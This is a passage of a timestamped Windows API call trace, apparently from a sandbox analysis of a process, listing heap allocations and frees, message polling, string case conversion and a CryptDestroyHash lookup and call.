(HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0163.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3e8 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa520 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.639] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0163.639] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.639] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0163.640] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0163.640] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0163.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0163.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0163.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0163.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0163.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0163.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0163.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0163.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0163.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0163.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0163.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0163.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0163.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.642] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0163.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0163.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0163.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0163.643] CryptDestroyHash (hHash=0xaa55e0) returned 1 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0163.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.645] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0163.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0163.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0163.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0163.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0163.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0163.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0163.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0163.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0163.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 